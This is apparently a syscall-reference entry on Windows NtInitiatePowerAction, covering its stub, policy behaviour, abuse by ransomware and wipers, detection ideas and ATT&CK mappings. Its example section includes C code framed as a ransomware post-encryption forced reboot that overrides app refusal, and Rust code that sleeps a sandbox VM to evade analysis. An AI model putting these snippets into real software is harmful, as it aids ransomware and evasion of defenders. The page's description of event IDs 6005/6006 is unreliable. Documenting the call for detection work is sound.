NtInitiatePowerAction

Prototype

NTSTATUS NtInitiatePowerAction(
  POWER_ACTION       SystemAction,
  SYSTEM_POWER_STATE MinSystemState,
  ULONG              Flags,
  BOOLEAN            Asynchronous
);

Arguments

Syscall IDs by Windows version

Syscall stub

4C 8B D1            mov r10, rcx
B8 0A 01 00 00      mov eax, 0x10A
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undocumented notes

Top-level power action entry point: `InitiatePowerActionW`, `SetSuspendState` (via powrprof.dll), `ExitWindowsEx` (for shutdown/reboot variants) and the Modern Standby fast-paths all route through here. Unlike `NtSetSystemPowerState`, this function goes through the **power policy manager**: it broadcasts WM_POWERBROADCAST / PBT_APMQUERYSUSPEND to running processes, honors `QUERY_ALLOWED` (i.e. apps can refuse), and only then delegates to `NtSetSystemPowerState` if the policy permits. Requires `SeShutdownPrivilege`. The `Asynchronous` parameter is the critical operational knob — async returns immediately and the caller cannot detect refusal; sync blocks until either the system resumes or a driver/app vetoes.

Common malware usage

**Ransomware post-encryption reboot** is the dominant abuse. Royal, BlackCat/ALPHV, Conti, LockBit 3.0 and BlackSuit all issue an InitiatePowerAction-class reboot after they finish writing the ransom note — the goal is to force users into the recovery-prompt or Windows RE screen, which reliably puts the ransom note on screen and prevents users from quickly rolling back via Volume Shadow Copies still in memory. **Wipers** (HermeticWiper, IsaacWiper, WhisperGate, CaddyWiper) similarly trigger a ShutdownReset to bring the box up with corrupted boot data. A smaller class of red-team loaders calls PowerActionSleep with `DISABLE_WAKES | CRITICAL` to evade short-lived sandbox sessions. Privilege requirement (SeShutdownPrivilege) is trivial for malware running as admin or LocalSystem, but for low-priv user code the privilege check fails — most ransomware ships a separate elevation primitive first.

Detection opportunities

Microsoft-Windows-Kernel-Power ETW provider emits structured events for every initiate-power-action: source process PID, action, flags, success/failure. Event log: System log Event ID 1074 records the initiating process for any user-initiated shutdown/reboot (clean), 6005/6006 record service-pack init, 6008 records dirty shutdowns. The most actionable behavioral rule: a process that issued >N file writes/modifies in the last 60 seconds and then calls a Shutdown/Reset class power action — that is a near-perfect ransomware indicator. SeShutdownPrivilege adjustment from a non-interactive token is itself unusual and worth alerting on. EDRs that hook ntdll see this call directly; direct-syscall variants bypass ntdll but still leave the ETW trace.

Direct syscall examples

; Direct syscall stub for NtInitiatePowerAction (SSN 0x10A on Win11 24H2)
NtInitiatePowerAction PROC
    mov  r10, rcx          ; syscall convention
    mov  eax, 10Ah         ; SSN — varies per build
    syscall
    ret
NtInitiatePowerAction ENDP

// Final step after the encryption pass and ransom-note drop.
// PowerActionShutdownReset = 6 (reboot), PowerSystemShutdown = 6.
// Flags = POWER_ACTION_DISABLE_WAKES | POWER_ACTION_CRITICAL
//          | POWER_ACTION_OVERRIDE_APPS  bypass app refusal.
#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *pNtInitiatePowerAction)(ULONG, ULONG, ULONG, BOOLEAN);

VOID PostEncryptReboot(VOID) {
    pNtInitiatePowerAction NtInitiatePowerAction = (pNtInitiatePowerAction)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtInitiatePowerAction");
    // SeShutdownPrivilege assumed already enabled
    NtInitiatePowerAction(
        /* SystemAction   */ 6,
        /* MinSystemState */ 6,
        /* Flags          */ 0xC0010000, // CRITICAL | DISABLE_WAKES | OVERRIDE_APPS
        /* Asynchronous   */ FALSE);
}

// Cargo: windows-sys = "0.59"
// Try to put the analysis VM into S3 sleep before the loader's real work runs.
// Async + DISABLE_WAKES prevents most sandbox harnesses from resuming it cleanly.
use windows_sys::Win32::Security::*;
use windows_sys::Win32::System::Threading::*;
use windows_sys::Win32::Foundation::*;

extern "system" {
    fn NtInitiatePowerAction(action: u32, min_state: u32, flags: u32, asynch: u8) -> i32;
}

pub unsafe fn evade_via_sleep() -> i32 {
    let mut tok: HANDLE = std::mem::zeroed();
    OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &mut tok);
    // (omitted: LookupPrivilegeValueW + AdjustTokenPrivileges for SeShutdownPrivilege)
    // PowerActionSleep = 2, PowerSystemSleeping3 = 5
    NtInitiatePowerAction(2, 5, 0x40000000 /* DISABLE_WAKES */, 1)
}

MITRE ATT&CK mappings

• T1529System Shutdown/Rebootmitre ↗
• T1485Data Destructionmitre ↗
• T1497Virtualization/Sandbox Evasionmitre ↗